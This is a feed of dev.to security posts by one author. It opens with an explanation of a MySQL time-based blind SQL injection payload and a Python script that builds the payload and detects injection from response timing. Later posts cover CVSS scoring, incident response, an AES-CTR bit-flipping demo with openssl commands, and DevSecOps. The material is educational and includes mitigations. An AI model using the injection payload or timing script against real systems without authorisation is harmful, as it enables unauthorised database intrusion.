&lt;strong&gt;&lt;a href="https://example%5B.%5Dcom/%E2%80%99XOR(SELECT(0)FROM(SELECT(SLEEP(2)))a)XOR%E2%80%99Z" rel="noopener noreferrer"&gt;https://example[.]com/’XOR(SELECT(0)FROM(SELECT(SLEEP(2)))a)XOR’Z&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gprqrnb7a12gpolrso0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gprqrnb7a12gpolrso0.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fny8jdxvgyt8y83d4n1jr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fny8jdxvgyt8y83d4n1jr.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fczppwuygpjqrtedskcic.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fczppwuygpjqrtedskcic.png" alt="Image description"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In web application security testing, SQL injection (SQLi) remains a critical concern, posing significant risks to data integrity and system security. This writeup looks at one time-based (blind) SQL injection technique: a payload that makes the database pause, so that a measurable delay in the server's response confirms the injection even when the page reflects no data and no errors. It covers the payload's methodology, its potential impact, and mitigation strategies.&lt;/p&gt;

&lt;p&gt;The payload &lt;code&gt;'XOR(SELECT(0)FROM(SELECT(SLEEP(2)))a)XOR'Z&lt;/code&gt; is a time-based (blind) SQL injection probe for MySQL and MariaDB, written for a parameter that the application splices into a single-quoted string literal. Its quotes must be plain ASCII apostrophes; typographic quotes copied from a document will not close the literal. Each part does a specific job:&lt;/p&gt;

&lt;p&gt;Leading quote and XOR: the first &lt;code&gt;'&lt;/code&gt; closes the application's string literal, and &lt;code&gt;XOR&lt;/code&gt; (MySQL's logical exclusive-or) joins the now-empty literal to the injected expression. XOR is chosen over AND/OR because it needs no surrounding spaces and is less often on keyword blocklists, which is why it shows up in filter-evasion payloads; it does nothing against a parameterized query.&lt;br&gt;
Subquery with SLEEP: &lt;code&gt;(SELECT(0)FROM(SELECT(SLEEP(2)))a)&lt;/code&gt; runs &lt;code&gt;SLEEP(2)&lt;/code&gt; inside a derived table (the alias &lt;code&gt;a&lt;/code&gt; is mandatory in MySQL) and yields 0, so the overall condition is unchanged apart from a roughly two-second pause. Response time is the only signal the tester gets, which is what makes this form useful when the page reflects neither data nor errors. The pause can exceed two seconds if the condition is evaluated once per row, so confirm with two different sleep values and repeated requests rather than a single slow response.&lt;br&gt;
Trailing XOR'Z: the final &lt;code&gt;XOR'Z&lt;/code&gt; opens a new literal that the application's own closing quote completes, so the query becomes &lt;code&gt;WHERE col=''XOR(...)XOR'Z'&lt;/code&gt; and stays syntactically valid without a comment sequence (&lt;code&gt;-- &lt;/code&gt; or &lt;code&gt;#&lt;/code&gt;) and without any whitespace, which also lets it fit into URL paths and fields that strip spaces.&lt;br&gt;
Backend dependence: &lt;code&gt;SLEEP&lt;/code&gt; is MySQL/MariaDB-specific. PostgreSQL uses &lt;code&gt;pg_sleep()&lt;/code&gt;, Microsoft SQL Server &lt;code&gt;WAITFOR DELAY&lt;/code&gt;, and Oracle &lt;code&gt;DBMS_LOCK.SLEEP&lt;/code&gt;, so the same idea needs a different function per database.&lt;br&gt;
It is imperative to approach SQL injection testing and security assessments ethically, responsibly, and only with authorization. Unauthorized or malicious exploitation of vulnerabilities can lead to legal consequences and compromise system integrity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Mitigation strategies for defending against SQL injection attacks include:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Input Validation: Validate inputs against the expected type, length, and character set as defense in depth. Validation alone is not a fix: the payload above uses no spaces and no comment characters precisely to slip past naive filters.&lt;br&gt;
Parameterized Queries: Use prepared statements or parameterized queries for every database call so that user input is bound as data and never concatenated into SQL text. This is the change that actually removes the vulnerability; with it, the payload above is an inert string.&lt;br&gt;
Web Application Firewalls (WAFs): Deploy a WAF with SQL injection signatures to block obvious probes before they reach the application server, treating it as a mitigating layer that can be bypassed rather than a replacement for parameterization.&lt;br&gt;
Regular Security Audits: Combine code review with dynamic testing, including time-based probes, which catch injection points that return neither data nor errors, to identify and remediate SQL injection vulnerabilities proactively.&lt;br&gt;
So, while the delay-based SQL injection technique showcases vulnerabilities in web applications, it underscores the importance of robust security practices, continuous monitoring, and collaboration between security professionals and developers to fortify systems against evolving cyber threats.&lt;/p&gt;
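&lt;p&gt;The following Python script is an added example, not code from this post. It assembles the payload above with a configurable sleep, prints the exact query a string-concatenating application would execute, and decides whether an endpoint is time-based injectable from response timing in a way that tolerates network jitter; it also shows the parameterized form that makes the same payload inert. The two endpoints, the &lt;code&gt;users&lt;/code&gt; table and the &lt;code&gt;name&lt;/code&gt; column are constructed stand-ins: the vulnerable one runs no SQL, it simply sleeps whenever &lt;code&gt;SLEEP(n)&lt;/code&gt; ends up in the assembled query, as a MySQL server would.&lt;/p&gt;

<![CDATA[
```python
"""Added example, not the post's code: build the delay payload, show the query it
yields under string concatenation, and decide 'injectable' from timing. The
endpoints, table and column names are constructed stand-ins."""
from __future__ import annotations

import re
import statistics
import time
from typing import Callable


def build_delay_payload(seconds: float) -> str:
    """The post's MySQL/MariaDB payload with a configurable sleep. The leading
    quote closes the application's string literal; the trailing 'Z opens a
    literal that the application's own closing quote completes, so no comment
    sequence and no whitespace are needed. Quotes must be ASCII apostrophes."""
    return f"'XOR(SELECT(0)FROM(SELECT(SLEEP({seconds})))a)XOR'Z"


def vulnerable_query(user_value: str) -> str:
    """String concatenation: the value becomes SQL text (the 'before' of the fix)."""
    return f"SELECT id FROM users WHERE name='{user_value}'"


SLEEP_CALL = re.compile(r"SLEEP\((\d+(?:\.\d+)?)\)")


def fake_vulnerable_endpoint(user_value: str) -> str:
    """Stand-in for a MySQL-backed page (constructed). It runs no SQL; it sleeps
    for every SLEEP(n) in the assembled query, as the server would when it
    evaluates the injected subquery."""
    for m in SLEEP_CALL.finditer(vulnerable_query(user_value)):
        time.sleep(float(m.group(1)))
    return "no results"


def fake_fixed_endpoint(user_value: str) -> str:
    """Parameterised stand-in (constructed): the value is bound, never spliced
    into SQL text, so SLEEP never reaches the parser and the payload is inert."""
    _sql, _params = "SELECT id FROM users WHERE name=%s", (user_value,)
    return "no results"


def median_latency(send: Callable[[str], str], value: str, repeats: int) -> float:
    """Median of several timings; the median absorbs an occasional slow round trip."""
    samples = []
    for _ in range(repeats):
        start = time.perf_counter()
        send(value)
        samples.append(time.perf_counter() - start)
    return statistics.median(samples)


def is_time_based_injectable(send: Callable[[str], str],
                             delays: tuple[float, ...] = (2, 4),
                             repeats: int = 3, tolerance: float = 0.8) -> bool:
    """Compare against a benign baseline for two different sleep lengths and
    require the extra latency to track SLEEP(n) both times: one slow response
    is jitter, latency that scales with the requested sleep is the injection."""
    baseline = median_latency(send, "alice", repeats)
    for n in delays:
        extra = median_latency(send, build_delay_payload(n), repeats) - baseline
        if extra < tolerance * n:
            return False
    return True


if __name__ == "__main__":
    print(vulnerable_query(build_delay_payload(2)))
    print("vulnerable:", is_time_based_injectable(fake_vulnerable_endpoint, delays=(0.2, 0.4)))
    print("fixed:     ", is_time_based_injectable(fake_fixed_endpoint, delays=(0.2, 0.4)))
```
]]>

&lt;p&gt;Against a real target, replace the stand-in with a function that sends the HTTP request and returns when the response arrives, and keep both the two different sleep lengths and the repeats: a single slow response is as likely to be network latency as injection, while extra latency that follows the requested sleep on every try is not.&lt;/p&gt;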

&lt;p&gt;Regards,&lt;/p&gt;

&lt;p&gt;Hafiz Muhammad Attaullah&lt;/p&gt;

</description>
      <category>webdev</category>
      <category>cybersecurity</category>
      <category>sqli</category>
    </item>
    <item>
      <title>Deletion of Data = Integrity Impact, Deletion of Data Availability Impact</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Fri, 29 Mar 2024 00:35:36 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/deletion-of-data-integrity-impact-deletion-of-data-availability-impact-147l</link>
      <guid>https://dev.to/attaullahshafiq10/deletion-of-data-integrity-impact-deletion-of-data-availability-impact-147l</guid>
      <description>&lt;p&gt;Does Data Deletion impact Availability?&lt;/p&gt;

&lt;p&gt;Picture this scenario:&lt;br&gt;
You uncover a vulnerability that would allow an attacker to delete all files in the web server’s root directory.&lt;/p&gt;

&lt;p&gt;How would you rate the Availability metric for this vulnerability on the CVSS calculator?&lt;/p&gt;

&lt;p&gt;High? Low? None?&lt;/p&gt;

&lt;p&gt;If you had asked me this question a few years ago, I would have answered: &lt;/p&gt;

&lt;p&gt;High, isn’t it obvious?&lt;br&gt;
This vulnerability allows an attacker to delete all files from the web server’s root directory. This would make the website unusable for other users. Hence, “High Impact” on availability.&lt;/p&gt;

&lt;p&gt;However, let's read the definition of the Availability metric in the CVSS specification:&lt;/p&gt;

&lt;p&gt;While the Confidentiality and Integrity impact metrics apply to the loss of confidentiality or integrity of data (e.g., information, files) used by the system, this metric refers to the loss of availability of the impacted system itself, such as a networked service (e.g., web, database, email).&lt;br&gt;
&lt;a href="https://lnkd.in/exVsP3BP"&gt;https://lnkd.in/exVsP3BP&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;In simple terms, it means that “Availability” in the CVSS calculator is the availability of the underlying system/service, not the availability of data.&lt;/p&gt;

&lt;p&gt;Now, let’s look back at the above web server file deletion example and ask ourselves this question:&lt;/p&gt;

&lt;p&gt;Does deleting all files in the website’s root directory impact the availability of the web “service”?&lt;/p&gt;

&lt;p&gt;It doesn’t. The web service is still running. The only difference is that it is now not serving the intended files. Hence, this vulnerability does not affect Availability, but it impacts Integrity.&lt;/p&gt;

&lt;p&gt;So, remember this:&lt;br&gt;
Deletion of Data = Integrity Impact &lt;br&gt;
Deletion of Data ≠ Availability Impact&lt;/p&gt;

&lt;p&gt;This is a very common misconception. So common, in fact, that First[.]org has a section dedicated to clarifying this in the CVSS user guide:&lt;br&gt;
&lt;a href="https://lnkd.in/eYYKdrsT"&gt;https://lnkd.in/eYYKdrsT&lt;/a&gt;&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;
✍️ What are your thoughts?
♻️ Reshare if this hits.
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;

</description>
      <category>cybersecurity</category>
      <category>integrity</category>
      <category>availability</category>
      <category>sql</category>
    </item>
    <item>
      <title>Cybersecurity Budget Analysis</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Fri, 29 Mar 2024 00:33:54 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/cybersecurity-budget-analysis-e9j</link>
      <guid>https://dev.to/attaullahshafiq10/cybersecurity-budget-analysis-e9j</guid>
      <description>&lt;p&gt;🔒 Unraveling the Complexities of Cybersecurity Budget Analysis 🔒&lt;/p&gt;

&lt;p&gt;In the realm of cybersecurity, discussions surrounding budget allocation can be fraught with complexities. While some rely on industry benchmarks, I urge you to take a step back and consider a more comprehensive approach. Let's delve into a different statistical analysis of cybersecurity budgets, shedding light on why it's crucial to look beyond simple percentages.&lt;/p&gt;

&lt;p&gt;1️⃣ Risk-Based Budgeting: Rather than fixating on arbitrary percentages, a more effective approach is to adopt risk-based budgeting. Start by evaluating your organization's unique risk landscape. Consider the potential impact of cyber threats, the likelihood of their occurrence, and the value of the assets at stake. This analysis allows you to prioritize your cybersecurity investments and allocate resources where they are most needed.&lt;/p&gt;

&lt;p&gt;2️⃣ Cost of a Breach: Understanding the cost of a potential data breach is a critical factor in determining your cybersecurity budget. Conduct a thorough assessment of the potential financial and reputational damage that a security incident could inflict on your organization. By quantifying the potential costs, you can allocate funds to preventive measures, incident response capabilities, and cyber insurance accordingly.&lt;/p&gt;

&lt;p&gt;3️⃣ Maturity Model Assessment: Consider adopting a maturity model assessment, such as the NIST Cybersecurity Framework or the ISO 27001 standard. These frameworks provide a structured approach to evaluate your organization's cybersecurity posture and identify areas that require investment. By conducting a maturity assessment, you can align your budget with specific improvement goals and measure progress over time.&lt;/p&gt;

&lt;p&gt;4️⃣ Return on Investment (ROI): It's crucial to evaluate the return on investment for your cybersecurity initiatives. This entails assessing the potential benefits and impact of each investment, such as reduced risk exposure, improved incident response capabilities, and enhanced regulatory compliance. By quantifying the expected ROI, you can make informed decisions about allocating resources to initiatives that deliver the most value to your organization.&lt;/p&gt;

&lt;p&gt;5️⃣ Continuous Monitoring and Adjustment: Cybersecurity is a dynamic field, and your budget should reflect that. Implement a system of continuous monitoring and adjustment, where you regularly evaluate the effectiveness of your investments and make adjustments based on emerging threats, technological advancements, and changes in your organization's risk profile. This proactive approach ensures that your budget remains aligned with evolving cybersecurity needs.&lt;/p&gt;

&lt;p&gt;Remember, statistical analysis of cybersecurity budgets should go beyond mere percentages. Embrace risk-based budgeting, factor in the cost of potential breaches, leverage maturity models, evaluate ROI, and maintain a flexible mindset through continuous monitoring and adjustment.&lt;/p&gt;

&lt;p&gt;By adopting this holistic approach, you can develop a cybersecurity budget that aligns with your organization's specific risks, goals, and priorities. It enables you to make informed decisions that maximize the effectiveness of your cybersecurity investments and ultimately protect your organization from ever-evolving cyber threats.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Incident Response For Common Attack Types</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Wed, 11 Oct 2023 17:43:42 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/incident-response-for-common-attack-types-4pdb</link>
      <guid>https://dev.to/attaullahshafiq10/incident-response-for-common-attack-types-4pdb</guid>
      <description>&lt;p&gt;Incident Response For Common Attack Types&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Brute Forcing&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Details:&lt;br&gt;
Attacker trying to guess a password by attempting several different passwords&lt;br&gt;
Threat Indicators:&lt;br&gt;
Multiple login failures in a short period of time&lt;br&gt;
Where To Investigate:&lt;br&gt;
• Active directory logs&lt;br&gt;
• Application logs&lt;br&gt;
• Operating system logs&lt;br&gt;
• Contact user&lt;br&gt;
Possible Actions:&lt;br&gt;
If not a legitimate action, disable the account and investigate/block the attacker&lt;/p&gt;

&lt;ol start="2"&gt;
&lt;li&gt;Botnets&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Details:&lt;br&gt;
Attackers are using the victim server to perform DDoS attacks or other malicious activities&lt;br&gt;
Threat Indicators:&lt;br&gt;
• Connection to suspicious IPs&lt;br&gt;
• Abnormally high volume of network traffic&lt;br&gt;
Where To Investigate:&lt;br&gt;
• Network traffic&lt;br&gt;
• OS logs (new processes)&lt;br&gt;
• Contact server owner&lt;br&gt;
• Contact support team&lt;br&gt;
Possible Actions:&lt;br&gt;
If confirmed:&lt;br&gt;
• Isolate the server&lt;br&gt;
• Remove malicious processes&lt;br&gt;
• Patch the vulnerability utilized for infection&lt;/p&gt;

&lt;ol start="3"&gt;
&lt;li&gt;Ransomware&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Details:&lt;br&gt;
A type of malware that encrypts files and requests a ransom (money payment) from the user to decrypt the files&lt;br&gt;
Threat Indicators:&lt;br&gt;
• Anti-Virus alerts&lt;br&gt;
• Connection to suspicious IPs&lt;br&gt;
Where To Investigate:&lt;br&gt;
• AV logs&lt;br&gt;
• OS logs&lt;br&gt;
• Account logs&lt;br&gt;
• Network traffic&lt;br&gt;
Possible Actions:&lt;br&gt;
• Request AV checks&lt;br&gt;
• Isolate the machine&lt;/p&gt;

&lt;ol start="4"&gt;
&lt;li&gt;Data Exfiltration&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Details:&lt;br&gt;
The attacker (or rogue employee) exfiltrates data to external sources&lt;br&gt;
Threat Indicators:&lt;br&gt;
• Abnormally high network traffic&lt;br&gt;
• Connection to cloud-storage solutions (Dropbox, Google Cloud)&lt;br&gt;
• Unusual USB sticks&lt;br&gt;
Where To Investigate:&lt;br&gt;
• Network traffic&lt;br&gt;
• Proxy logs&lt;br&gt;
• OS logs&lt;br&gt;
Possible Actions:&lt;br&gt;
• If employee: Contact manager, perform full forensics&lt;br&gt;
• If external threat: Isolate the machine, disconnect from network&lt;/p&gt;

&lt;ol start="5"&gt;
&lt;li&gt;Compromised Account&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Details:&lt;br&gt;
Attackers get access to one account (via social engineering or any other method)&lt;br&gt;
Threat Indicators:&lt;br&gt;
• Off-hours account logins&lt;br&gt;
• Account group changes&lt;br&gt;
• Abnormally high network traffic&lt;br&gt;
Where To Investigate:&lt;br&gt;
• Active directory logs&lt;br&gt;
• OS logs&lt;br&gt;
• Network traffic&lt;br&gt;
• Contact user for clarifications&lt;br&gt;
Possible Actions:&lt;br&gt;
If confirmed:&lt;br&gt;
• Disable account&lt;br&gt;
• Password changes&lt;br&gt;
• Forensic investigations&lt;/p&gt;

&lt;ol start="6"&gt;
&lt;li&gt;Denial Of Service (DoS/DDoS)&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;Details:&lt;br&gt;
When an attacker can cause interference in a system by exploiting DoS vulnerabilities or by generating a high volume of traffic&lt;br&gt;
Threat Indicators:&lt;br&gt;
Abnormally high network traffic on public-facing servers&lt;br&gt;
Where To Investigate:&lt;br&gt;
• Network traffic&lt;br&gt;
• Firewall logs&lt;br&gt;
• OS logs&lt;br&gt;
Possible Actions:&lt;br&gt;
• If DoS due to vulnerabilities: Contact the patching team for remediation&lt;br&gt;
• If DDoS due to network traffic: Contact network Support or ISP&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Don't go straight into cyber</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Fri, 08 Sep 2023 17:48:04 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/dont-go-straight-into-cyber-16kc</link>
      <guid>https://dev.to/attaullahshafiq10/dont-go-straight-into-cyber-16kc</guid>
      <description>&lt;p&gt;When I look back on all the things I've learned just to get to the point where penetration testing made sense for me, I can see now why I was told SOOO many times 'don't go straight into cyber.'&lt;/p&gt;

&lt;p&gt;But, and let's be real here... my inner monologue was:&lt;/p&gt;

&lt;p&gt;"Help desk sucks, and I don't want to be forced into systems administration because that's even worse. Networking? Oh man that's simple and the only reason it seems hard is that it's so boring. Coding? That stuff makes me want to punch a wall it's so hard (I'm talking production level code)."&lt;/p&gt;

&lt;p&gt;I JUST WANTED TO BE IN SECURITY... and in my case I love popping boxes and finding vulnerabilities in code.&lt;/p&gt;

&lt;p&gt;Here's the thing though, while prepping for my OSCP I have utilized sysadmin while setting up VMs, setting up MS Server, and a whole lot while interacting with Linux.&lt;/p&gt;

&lt;p&gt;My web dev skills have come into play while analyzing code and vulnerabilities in web apps... and at various points while setting up web servers to host client code for analysis.&lt;/p&gt;

&lt;p&gt;Networking... guys that comes up all over the place and I'm not kidding about that at all. Do not skip networking! The CCNA will SAVE YOUR LIFE!&lt;/p&gt;

&lt;p&gt;What I'm saying is that unfortunately for the new people I'm doubling down on the statements put forward by others saying you can't go straight into cyber... at least you shouldn't. And you DEFINITELY can't go straight into pentesting!&lt;/p&gt;

&lt;p&gt;In today's job market especially, I'd be looking at networking combined with cloud expertise as a staging ground for a career in cyber security.&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>webdev</category>
      <category>programming</category>
    </item>
    <item>
      <title>Can You Trust AES Encryption?</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Sat, 08 Jul 2023 06:41:20 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/can-you-trust-aes-encryption-31gf</link>
      <guid>https://dev.to/attaullahshafiq10/can-you-trust-aes-encryption-31gf</guid>
      <description>&lt;p&gt;In this article, I will not break the AES method (as it has yet to be broken), but breach its integrity. This is because some modes of AES are not good at handling the integrity of the message. The fast stream cipher modes, such as with CTR and GCM are especially prone to this lack of integrity checking, as it is easy to pick off the characters to target.&lt;/p&gt;

&lt;p&gt;As a magic trick, I will take the encrypted message of:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Pay Bob 1 dollar
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;and then flip a few bits to give the ciphertext for:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Pay Bob 2 dollar
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In ASCII, a ‘1’ is 0110001, and a ‘2’ is 0110010, and so all I have to do, is to find the place of the character I want to flip in the ciphertext, and then flip the two least significant bits.&lt;/p&gt;

&lt;p&gt;First, I will encrypt the message using AES CTR mode — a fast stream cipher mode with AES — and use a passphrase of “bob123”. The encryption key will be generated using PBKDF2:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ echo "Pay Bob 1 dollar" | openssl enc -k bob123 -e -aes-128-ctr -pbkdf2 &amp;gt;ciphertext
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The ciphertext will be in a binary form:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ cat ciphertext
Salted__?T????i??k=e??n??.3?%
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;We can then use xxd to convert this binary format into a ciphertext so that we can edit the ciphertext:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$ xxd ciphertext &amp;gt; data
$ cat data
00000000: 5361 6c74 6564 5f5f f354 1385 819d f1a3  Salted__.T......
00000010: 69fa 816b 3d65 80ed 136e a405 f02e 3307  i..k=e...n....3.
00000020: e6 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;AES CTR is a stream mode, so it is easy to find all of the characters in the cipher, as they map straight to their position in the plaintext. Now, we ignore that last byte (e6) and count back the number of characters to the ciphertext of ‘1’. In this case, it is eight characters from the end, so let’s change the ciphertext to:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;(base) billbuchanan@ASecuritySite ~ % cat data
00000000: 5361 6c74 6564 5f5f f354 1385 819d f1a3  Salted__.T......
00000010: 69fa 816b 3d65 80ed 106e a405 f02e 3307  i..k=e...n....3.
00000020: e6 
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In this case, I have changed “136e” to “106e”, and only flipped two bits (from 0010011 to 0010000, which should change a ‘1’ to a ‘2’). Now we will convert the cipher back into binary, and decrypt:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;% xxd -r data &amp;gt; ciphertext
% cat ciphertext
Salted__?T????i??k=e??n??.3?%
% cat ciphertext | openssl enc -k bob123 -d -aes-128-ctr -pbkdf2   
Pay Bob 2 dollar     
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;And magically, we have converted one dollar into two!!!!&lt;/p&gt;

&lt;p&gt;Why does this happen? Well, the integrity checking in OpenSSL is not very good, and it struggles to detect whether bits have been flipped in the cipher.&lt;/p&gt;

&lt;p&gt;Here is the demo:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vimeo.com/manage/videos/843411936"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Overall, CTR and GCM are two of the fastest and most widely used modes in AES. Their great advantage is that they convert the block mode into a stream cipher (and thus do not need padding and can be processed in parallel). They are beaten for performance only by ECB, which has serious weaknesses (as it has no nonce input):&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--NVML56ZV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xlxk7ihg9zrsujg56rzg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--NVML56ZV--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://dev-to-uploads.s3.amazonaws.com/uploads/articles/xlxk7ihg9zrsujg56rzg.png" alt="Image description" width="800" height="589"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If you are interested in the performance of AES modes, try here:&lt;br&gt;
&lt;a href="https://medium.com/asecuritysite-when-bob-met-alice/whats-the-fastest-symmetric-cipher-and-mode-3d6e77841c2b"&gt;https://medium.com/asecuritysite-when-bob-met-alice/whats-the-fastest-symmetric-cipher-and-mode-3d6e77841c2b&lt;/a&gt;&lt;/p&gt;

</description>
    </item>
    <item>
      <title>How does SecOps work with DevOps?</title>
      <dc:creator>Hafiz Muhammad Attaullah</dc:creator>
      <pubDate>Tue, 20 Jun 2023 17:58:01 +0000</pubDate>
      <link>https://dev.to/attaullahshafiq10/phow-does-secops-work-with-devops-2nie</link>
      <guid>https://dev.to/attaullahshafiq10/phow-does-secops-work-with-devops-2nie</guid>
      <description>&lt;p&gt;The level of competition driven by digital disruption is intense. Coping with the demand for application delivery life cycles measured in seconds — with shrinking resources and increased complexity — requires a new approach. To compete today, leaders are automating application delivery to operationalize their competitive advantage.&lt;/p&gt;

&lt;p&gt;Using a DevOps approach, companies can deliver applications faster, at a higher level of quality, and at a lower cost. In fact, a study by McKinsey found that companies that embrace an agile DevOps approach to development, testing, and operations see an 83 percent improvement in time to market, 90 percent faster updates to servers, and a near 50 percent reduction in handoffs per process.&lt;/p&gt;

&lt;p&gt;As organizations “shift left” (test early and often in the software development life cycle process) to improve agility, this naturally creates new challenges and exposes different bottlenecks in their DevOps processes. For example, compliance and security remain a manual, ad‐hoc activity at the end of a release, which forces tough decisions about risk acceptance versus costly late code fixes. Furthermore, cloud adoption and containerization introduce mode‐two (new and innovative) resources into these processes that create real security and compliance gaps that most organizations haven’t considered. Without a comprehensive compliance strategy that addresses these issues, organizations will eventually fall behind competitors and increase their risk of data breaches and ransomware.&lt;/p&gt;

&lt;p&gt;SecOps helps organizations gain a competitive advantage by increasing agility, while closing security and compliance gaps associated with the latest cloud and container technologies. A comprehensive SecOps program provides a unified view of compliance data collected across data center, cloud, and container resources that is analyzed against flexible predefined policies. Compliance checks can also be embedded directly in DevOps pipelines for instant feedback regarding go and no‐go decisions in the process.&lt;/p&gt;

</description>
      <category>secops</category>
      <category>devsecops</category>
      <category>devops</category>
      <category>cybersecurity</category>
    </item>
  </channel>
</rss>
